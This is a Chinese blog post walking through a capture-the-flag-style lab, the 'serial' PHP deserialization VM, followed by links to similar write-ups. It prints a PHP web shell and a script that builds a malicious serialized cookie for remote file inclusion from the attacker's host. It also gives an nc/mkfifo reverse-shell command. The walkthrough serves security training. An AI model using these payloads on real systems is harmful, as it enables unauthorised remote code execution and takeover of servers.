serial 反序列化靶机

最新推荐文章于 2024-11-13 15:10:22 发布
最新推荐文章于 2024-11-13 15:10:22 发布
阅读量665 收藏 4
点赞数 23
文章标签: tcp/ip c语言 网络协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/l_OMl_l/article/details/140858435
版权

1.安装靶机

2.扫描靶机ip,端口,访问

3.扫描目录,发现有 backup 目录,访问发现是压缩包,下载,解压,查看

通过审计源代码了解到: 首次访问该网站后,会通过 user.class.php 中的创建一个user对象, 内容为wel变量创建welcome对象,同时进行序列化base64编码存入cookie,在此过程中调用了 handler() 函数; 同时, log.class.php 中的 Log 类中也有 handler() 函数,并且还存在 include 文件包含漏洞,所以我们可以尝试将 Welcome 替换为 Log 类

4.构造下方代码 1.php ,保存到自己的网站下运行,实现将 welcome 替换为 Log ,同时使用文件包含漏洞上传木马文件,最后将代码序列化并 base64 编码

<?php
	@system($_GET['OMO']);
?>
<?php
  class Log {
    private $type_log = "http://本机ip/cc.txt";
  }
 
  class User {
    private $name = "admin";
    private $wel;
 
    function __construct() {
      $this->wel = new Log();
  }
}
$obj = new User();
echo base64_encode(serialize($obj));
Tzo0OiJVc2VyIjoyOntzOjEwOiIAVXNlcgBuYW1lIjtzOjU6ImFkbWluIjtzOjk6IgBVc2VyAHdlbCI7TzozOiJMb2ciOjE6e3M6MTM6IgBMb2cAdHlwZV9sb2ciO3M6Mjc6Imh0dHA6Ly8xOTIuMTY4LjMuMjU0L2NjLnR4dCI7fX0=

5.在 kali 开启监听, 抓包,发送重放器,修改 cookie ,并在 GET 处添加参数以及 shell 反弹语句rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+kali ip+7777+>/tmp/f

6.发送后,获取靶机 shell ,查看文件获取虚拟机密码

7.登录虚拟机

LTJOMO
关注
[ vulhub漏洞复现篇 ] Jboss_JMXInvokerServlet_Deserialization(反序列化)代码执行漏洞
qq_51577576的博客
09-15 1146
Jboss_JMXInvokerServlet_Deserialization代码执行漏洞 该漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞。
fastjson 1.2.24 反序列化导致任意命令执行漏洞复现
薛定谔嘚喵博客
05-30 1225
fastjson是阿里巴巴的开源JSON解析库,它可以解析JSON格式的字符串,的作用就是把java对象转换为json形式,也可 以用来将json转换为java对象。fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链。
php反序列化靶机serial实战
zzgslh的博客
04-07 1289
靶机描述 今天研究一下php反序列化靶机serial实战。目标为获取root权限。 靶机信息 可以去vulhub上下载此靶机: https://www.vulnhub.com/entry/serial-1,349/ 下载好,之后,使用Vmware新建虚拟机打开,步骤如下: 1.首先创建新的虚拟机。 2.然后选择客户机版本为Ubuntu 64位。 3.然后选择使用现有磁盘,选择下载的...
反序列化靶机serial复现
muyuchen110的博客
08-01 775
【代码】反序列化靶机serial复现。
反序列化靶机serial
weixin_53198216的博客
08-01 339
5.进行base64解码,乱码为空格改为\x00,再次进行base64加密,得到payload如下。4.F12查看网络,刷新一下得到一串base64编码。6.打开抓包替换为修改后的payload。2.打开kali扫描IP。后面的明天做先吃饭去了。1.安装靶场进行配置。
反序列化靶机--serial
weixin_53736204的博客
08-03 481
可以去vulhub上下载此靶机:下载好,之后,使用Vmware新建虚拟机打开,步骤如下:1.首先创建新的虚拟机。保持现有格式打开虚拟机,环境配置完成。
反序列化靶机-serial攻略
qq_68186313的博客
08-01 526
8、查看代码,发现index.php文件包含了user.class.php文件,对cookie中的user参数进行了序列化和base64编码,然后user.class.php文件包含了log.class.php,且定义了两个类,分别是Welcome和User,并调用了log.class.php文件中的handler函数。log.class.php文件又定义了Log类和成员变量type_log,且handler函数对变量还进行了文件包含和输出。7、下载bak.zip,解压发现3个php文件。
vulhub-serial-php反序列化靶机实战
飞鱼的企鹅的博客
01-04 1993
前言 此漏洞环境是vulhub上的系列漏洞之一,是php反序列化漏洞,也用到了远程代码执行漏洞。 复现过程 环境搭建 靶机下载地址 https://www.vulnhub.com/entry/serial-1,349/ 下载好之后直接用Vmware workstation打开就行了 存活扫描 内网存活主机扫描 arp-scan -l 扫描到的存活主机是192.168.77.157 端口扫描 ...
vulhub-serial-php反序列化靶机
日常打一些漏洞靶机
08-06 743
然后构造payload,尝试读取passwd文件,payload如下 新创建一个123.php在本地的www下 然后 把type_log参数后面记得改成自己上传到本地的一句话木马。然后去抓包 把访问123.php得到的base64编码 替换cookie 然后打一个whoami成功执行。然后去访问自己新创建的php 我这里用的是123.php 打开就看到他的base64编码。使用御剑扫描发现存在**…/backup/**路径,访问发现存在目录遍历漏洞。查看文件,多返回几次上级目录,找到一个txt文件。
反序列化靶机serial漏洞复现 超详细教程
qq_48368964的博客
08-01 825
漏洞环境:https://www.vulnhub.com/entry/serial-1,349/ 下载后使用Vmware打开创建新的虚拟机: 选择客户机版本为Ubuntu 64位: 一直下一步,知道选择使用现有磁盘: 选择下载的vmdk磁盘文件: 开机,环境配置完成: 访问下web 抓一下包发到重放器中看看 发现 cook 是被加密的解码网址:Base64 在线编码解码 | Base64 加密解密 - Base64.us下载下来三个文件 index.php: user.class.php:
反序列化靶机实战serial(保姆级教程)
2201_75891821的博客
08-01 1307
反序列靶机教程 详细
Apache Log4j反序列化命令执行漏洞
01-10
vulhub靶机里的这个漏洞里缺少了curl或者wget这些命令
命令执行(RCE)与反序列化
赤赤三的博客
03-24 5948
命令执行(RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。): 分类: 远程系统命令执行exec()、system()、assert(): 设计者在编写代码时没有做严格的安全控制,导致攻击者通过接口或相关参数提交“意想不到”的命令,从而让后台进行执行,从而控制整个后台服务器 。 涉及系统命令:assert,system,passthru,exec,pcntl_exec,shell_exec,popen,proc_open,``(反单引号) .
Apereo CAS 4.1 反序列化 RCE 漏洞复现实验报告
weixin_48400575的博客
01-25 3249
演示视频 Apereo CAS 4.1 反序列化 RCE 漏洞_哔哩哔哩_bilibiliBGM:《芳华慢》+《霜雪千年》(by等什么君)https://www.bilibili.com/video/BV16Y411b7T8/ 参考文章 https://vulhub.org/#/environments/apereo-cas/4.1-rce/ Apereo-cas 4.1 反序列化 RCE 漏洞_菜鸟的学习笔记-CSDN博客Apereo-cas 4.1 反序列化 RCE 漏洞一. 环境搭建使用vul
【计算机网络】TCP网络程序
m0_73551869的博客
11-12 90
一、服务器二、客户端。
使用 Python 向 IP 地址发送字符串 —— TCP 与 UDP 协议详解
XMYX-0
11-13 449
TCP 是一种面向连接的、可靠的传输层协议。它在通信之前必须先建立连接,确保数据传输的可靠性。TCP 协议通过三次握手过程建立连接,并且在数据传输过程中保证数据的完整性和顺序。如果传输的过程中发生数据丢失或错误,TCP 会自动进行重传。UDP 是一种无连接的协议,与 TCP 不同,UDP 不需要在传输前建立连接,因此可以提供更低的延迟。UDP 不保证数据的可靠性,可能会出现数据丢失、重复或乱序的情况,因此它更适用于实时性要求较高的场景,如视频流和语音通信。
Xilinx Aurora 8B/10B IP介绍以及下板验证
最新发布
主要分享学习中的知识和遇到的问题
11-13 601
Aurora协议是一种用于FPGA和其他硬件设备之间高速串行数据传输的协议,为物理层提供透明接口;用于在点对点串行链路间移动数据的可扩展轻量级链路层协议,由Xilinx公司开发。它主要用于在FPGA之间、FPGA与处理器之间、或FPGA与其他外部设备之间进行高效的数据通信。
Tcp/Ip协议,tcp相关文章,网络编程,通信协议文章汇总
求是
11-10 334
都是网络协议相关的,tcp/ip, arp, dhcp, icmp, http。学习时候,有些书籍过一段时间就忘记了。常读常新,特此留下地址方便再次阅读!4.如果你喜欢看视频。1. tcp/ip 协议卷。2.不为人知的网络编程。
web实验3:虚拟主机基于不同端口、目录、IP、域名访问不同页面
Nightwish36的博客
11-13 101
客户端访问8080端口测试:(访问的位置是配置文件里面location里面的目录,location的目录会覆盖server里面的目录)
CMS靶机源码深入剖析
这些工具可能包括漏洞扫描器、网络嗅探工具、自动化渗透测试框架等。掌握这些工具的使用对于提高测试效率和安全性评估的质量至关重要。 8. 教育与学习资源:对于网络安全爱好者来说,靶机提供了一个学习和实践的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值